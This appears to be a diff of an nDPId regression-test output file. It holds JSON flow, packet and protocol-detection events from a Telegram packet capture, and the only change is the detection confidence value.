00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"telegram.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.3","src_port":28150,"dst_port":530,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"telegram.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1588779637543,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779637543,"pkt":"EBMx8Tl2KDc3AG3ICABFAABE6yEAAEARZiPAqAFNW2wMA232AhIAMCHWL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/+2+xugMe3kOw=="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"telegram.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.3","src_port":28150,"dst_port":530,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"telegram.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.3","src_port":28150,"dst_port":530,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"telegram.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.1","src_port":28150,"dst_port":533,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"telegram.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1588779637543,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779637543,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEy+YAAEARiWDAqAFNW2wIAW32AhUAMEz1L+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/+LrTXW6BYYCg=="} 
-00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":737,"source":"telegram.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.1","src_port":28150,"dst_port":533,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":737,"source":"telegram.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.1","src_port":28150,"dst_port":533,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":738,"source":"telegram.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":28150,"dst_port":537,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"telegram.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1588779637543,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779637543,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEayUAAEAR5h3AqAFNW2wMBW32AhkAMN01L+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/+U8S0SsiW5Mg=="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":738,"source":"telegram.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":28150,"dst_port":537,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":738,"source":"telegram.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":28150,"dst_port":537,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":739,"source":"telegram.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.3","src_port":28150,"dst_port":537,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"telegram.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1588779637543,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779637543,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEEQsAAEARPDrAqAFNW2wQA232AhkAMF6eL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/Ppp3gSInx5A=="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":739,"source":"telegram.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.3","src_port":28150,"dst_port":537,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":739,"source":"telegram.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.3","src_port":28150,"dst_port":537,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1588779637560,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1588779637560,"pkt":"EBMx8Tl2KDc3AG3ICABFAABF+GQAAP8RP6TAqAFNwKgBAdVDADUAMZzqakQBAAABAAAAAAAAAWIHX2Rucy1zZARfdWRwBG50b3ADb3JnAAAMAAE="} 00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1588779637572,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":136,"pkt_l4_len":102,"thread_ts_msec":1588779637572,"pkt":"KDc3AG3IEBMx8Tl2CABFAAB67hUAAEARCL\/AqAEBwKgBTQA11UMAZgAAakSBgwABAAAAAQAAAWIHX2Rucy1zZARfdWRwBG50b3ADb3JnAAAMAAHAGwAGAAEAAAA0ACkFZG5zZG\/AGwpwb3N0bWFzdGVywBt4ZvNkAACowAAAHCAAJOoAAAACWA=="} 
-00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":741,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1588779629079,"flow_last_seen":1588779637572,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1588779637572,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":54595,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":1,"num_answers":1,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":741,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1588779629079,"flow_last_seen":1588779637572,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1588779637572,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":54595,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":1,"num_answers":1,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"telegram.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1588779637577,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1588779637577,"pkt":"KDc3AG3IEBMx8Tl2CABFAABcg6JAADMRnoxbbAgBwKgBTQIVbfYASNOVL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8dyFcB12rJei6011ugWGAoAAAAAAAAAAAAA\/\/9XC83DTfQAAA=="} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":743,"source":"telegram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1588779637582,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1588779637582,"pkt":"KDc3AG3IEBMx8Tl2CABFAABc3cdAADMRRGBbbAgIwKgBTQIRbfYASNNBL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8dyFcB12rJeEn+yq6ttUV0AAAAAAAAAAAAA\/\/9XC83DTfQAAA=="} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"telegram.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1588779637681,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1588779637681,"pkt":"KDc3AG3IEBMx8Tl2CABFAABcuRdAADQRZBVbbAwDwKgBTQISbfYASKh2L+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8dyFcB12rJetvsboDHt5DsAAAAAAAAAAAAA\/\/9XC83DTfQAAA=="} 
@@ -193,7 +193,7 @@ 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"telegram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1588779637715,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1588779637715,"pkt":"KDc3AG3IEBMx8Tl2CABFAABcdalAADYRoYVbbBABwKgBTQIRbfYASCaUL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8dyFcB12rJeYA3ERBA7Mh0AAAAAAAAAAAAA\/\/9XC83DTfQAAA=="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":748,"source":"telegram.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637830,"flow_last_seen":1588779637830,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1588779637830,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"239.255.255.250","src_port":52127,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"telegram.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1588779637830,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1588779637830,"pkt":"AQBef\/\/6KDc3AG3ICABFAADKg14AAAERg9XAqAFN7\/\/\/+sufB2wAtsJkTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS84My4wLjQxMDMuMzQgTWFjIE9TIFgNCg0K"} 
-00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"telegram.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637830,"flow_last_seen":1588779637830,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1588779637830,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"239.255.255.250","src_port":52127,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"telegram.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637830,"flow_last_seen":1588779637830,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1588779637830,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"239.255.255.250","src_port":52127,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":749,"source":"telegram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1588779638048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779638048,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEsZEAAEARo67AqAFNW2wICG32AhEAMJEzL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/9ywagRVgIMjg=="} 
00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":750,"source":"telegram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1588779638048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779638048,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEUI8AAEAR\/LfAqAFNW2wQAW32AhEAMO1PL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/cV+9m8\/VZmQ=="} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":751,"source":"telegram.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1588779638048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779638048,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEfdIAAEAR03LAqAFNW2wMA232AhIAMLZjL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/DysMOlAk5VA=="} 
@@ -208,74 +208,74 @@ 00854{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1129,"source":"telegram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1588779645375,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"thread_ts_msec":1588779645375,"pkt":"AQBeAAD7eCjKBfrMCABFAAFTiPpAAAERTLfAqAFF4AAA+xTpFOkBP9DmAACEAAAAAAEAAAADEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAABAAAAeAAvEXNvbm9zNzgyOENBMDVGQUNDEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAARc29ub3M3ODI4Q0EwNUZBQ0MQX3Nwb3RpZnktY29ubmVjdARfdGNwBWxvY2FsAAAQgAEAABGUAB0LVkVSU0lPTj0xLjAQQ1BhdGg9L3Nwb3RpZnl6YxFzb25vczc4MjhDQTA1RkFDQxBfc3BvdGlmeS1jb25uZWN0BF90Y3AFbG9jYWwAACGAAQAAAHgAHwAAAAAFeBFzb25vczc4MjhDQTA1RkFDQwVsb2NhbAARc29ub3M3ODI4Q0EwNUZBQ0MFbG9jYWwAAAGAAQAAAHgABMCoAUU="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1131,"source":"telegram.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779645381,"flow_last_seen":1588779645381,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779645381,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":50698,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"telegram.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1588779645381,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1588779645381,"pkt":"AQBef\/\/6wJrQLWJ0CABFAACa3qgAAAERKNPAqAE17\/\/\/+sYKB2wAhlIKTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1131,"source":"telegram.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779645381,"flow_last_seen":1588779645381,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779645381,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":50698,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1131,"source":"telegram.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779645381,"flow_last_seen":1588779645381,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779645381,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":50698,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"telegram.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1588779647380,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1588779647380,"pkt":"AQBef\/\/6wJrQLWJ0CABFAACaUgcAAAERtXTAqAE17\/\/\/+sYKB2wAhlIKTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} 00854{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"telegram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1588779647380,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"thread_ts_msec":1588779647380,"pkt":"AQBeAAD7eCjKBfrMCABFAAFTigFAAAERS7DAqAFF4AAA+xTpFOkBP9DmAACEAAAAAAEAAAADEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAABAAAAeAAvEXNvbm9zNzgyOENBMDVGQUNDEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAARc29ub3M3ODI4Q0EwNUZBQ0MQX3Nwb3RpZnktY29ubmVjdARfdGNwBWxvY2FsAAAQgAEAABGUAB0LVkVSU0lPTj0xLjAQQ1BhdGg9L3Nwb3RpZnl6YxFzb25vczc4MjhDQTA1RkFDQxBfc3BvdGlmeS1jb25uZWN0BF90Y3AFbG9jYWwAACGAAQAAAHgAHwAAAAAFeBFzb25vczc4MjhDQTA1RkFDQwVsb2NhbAARc29ub3M3ODI4Q0EwNUZBQ0MFbG9jYWwAAAGAAQAAAHgABMCoAUU="} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1281,"source":"telegram.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779648840,"flow_last_seen":1588779648840,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779648840,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":56384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1281,"source":"telegram.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1588779648840,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1588779648840,"pkt":"AQBef\/\/6wJrQLWJ0CABFAACaCVUAAAER\/ibAqAE17\/\/\/+txAB2wAhjvUTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} 